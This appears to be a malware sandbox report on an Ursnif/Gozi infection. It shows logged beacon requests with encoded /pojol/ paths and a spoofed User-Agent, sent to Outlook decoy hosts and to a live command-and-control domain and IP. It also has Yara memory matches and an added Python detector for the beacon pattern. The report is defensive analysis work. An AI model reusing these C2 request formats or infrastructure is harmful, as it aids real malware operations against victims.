Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
Source: global traffic | HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
Source: global traffic | HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
Source: global traffic | HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
Source: global traffic | HTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: global traffic | HTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: global traffic | HTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: global traffic | HTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: global traffic | HTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: global traffic | HTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: xereunrtol.website
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 973402f4-6725-3934-5235-dbb411665df2Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB3PR08CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1X-FEServer: DB3PR08CA0032X-Powered-By: ASP.NETX-FEServer: AM6P193CA0099Date: Fri, 08 Oct 2021 04:45:27 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1X-FEServer: DB6P195CA0005X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0006Date: Fri, 08 Oct 2021 04:45:32 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000017.00000003.757597977.0000026CBE674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownDNS traffic detected: queries for: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: unknownHTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2
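
The requests above share one shape: a fixed first path segment (/pojol/), a long run of base64-looking segments in which '+' and '/' appear as _2B and _2F (one of the inserted slashes even splits an escape, "ciw_2/F7QY"), a short fake extension (.jop), and a User-Agent claiming IE 8 on Windows NT 10.0, a combination that never shipped. The first three hosts (outlook.com, www.outlook.com, outlook.office365.com) answer 404 from Microsoft IIS and are decoys; xereunrtol.website (193.29.104.83) is the live C2. The following Python is an added example written for this page, not part of the sandbox report or of the malware; it normalizes such a path back into its base64 text and classifies a request. The prefix, extension, User-Agent and decoy list are read off this sample and would be parameters for other builds, and the _2D = '=' mapping is an assumption that this sample does not exercise.

```python
"""Classify HTTP requests against the Ursnif/Gozi beacon pattern seen in this report."""
import re
from dataclasses import dataclass
from typing import Optional

# Per-campaign values read off the report: URI prefix "/pojol/" and extension ".jop".
# Other Ursnif builds use different prefixes and extensions, so treat these as parameters.
URI_PREFIX = "/pojol/"
URI_EXT = ".jop"
# The sample's User-Agent claims IE 8 on Windows NT 10.0, a combination that never shipped.
URSNIF_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
# Hosts the sample contacted first; they answered 404 from Microsoft IIS and carry no C2.
DECOY_HOSTS = {"outlook.com", "www.outlook.com", "outlook.office365.com"}
B64_TEXT = re.compile(r"^[A-Za-z0-9+/]+$")

# Two request paths copied from the report: the first went to xereunrtol.website,
# the second to the decoy host outlook.com.
SAMPLE_C2_PATH = (
    "/pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/"
    "ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/"
    "A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/"
    "o8_2B1xBC/F_2Bxvm0VV/ikN.jop")
SAMPLE_DECOY_PATH = (
    "/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/"
    "i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/"
    "XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/"
    "aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop")


@dataclass
class Verdict:
    kind: str            # "benign", "decoy" or "c2"
    ua_matches: bool     # User-Agent equals the sample's
    blob: Optional[str]  # reconstructed base64 text when the URI pattern matched


def reconstruct_blob(path: str) -> Optional[str]:
    """Undo the URI encoding: drop prefix and extension, remove the slashes scattered
    through the base64 text, then map _2B -> '+' and _2F -> '/' (both visible in the
    report). _2D -> '=' is an assumed padding escape that this sample does not use.
    Slashes must be removed first: the report shows "ciw_2/F7QY", a slash inside "_2F".
    Returns None when the result is not base64 text."""
    if not path.startswith(URI_PREFIX) or not path.endswith(URI_EXT):
        return None
    body = path[len(URI_PREFIX):-len(URI_EXT)]
    if "_2" not in body:
        return None  # no escape marker at all; a plain path under the prefix is too weak
    body = body.replace("/", "")
    body = body.replace("_2B", "+").replace("_2F", "/").replace("_2D", "=").rstrip("=")
    return body if B64_TEXT.match(body) else None


def classify(method: str, path: str, headers: dict) -> Verdict:
    """URI shape decides the verdict; the User-Agent is recorded as corroboration."""
    ua_ok = headers.get("User-Agent", "") == URSNIF_UA
    blob = reconstruct_blob(path) if method == "GET" else None
    if blob is None:
        return Verdict("benign", ua_ok, None)
    host = headers.get("Host", "").lower()
    return Verdict("decoy" if host in DECOY_HOSTS else "c2", ua_ok, blob)


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, path, headers


# The xereunrtol.website request from the report, rebuilt with CRLF line ends
# (the report prints the headers run together on one line).
SAMPLE_REQUEST = (
    "GET " + SAMPLE_C2_PATH + " HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "User-Agent: " + URSNIF_UA + "\r\nHost: xereunrtol.website\r\n\r\n"
)

if __name__ == "__main__":
    v = classify(*parse_raw_request(SAMPLE_REQUEST))
    print(v.kind, v.ua_matches, len(v.blob))
```

A "decoy" verdict identifies an infected client just as surely as a "c2" one, but the host in it must not be treated as attacker infrastructure. The reconstructed text is encrypted with a key from the bot configuration, which the report does not include, so the example stops at the base64 layer; that layer is still enough to pivot on across captures (same first segment, same extension, same escape style).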

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
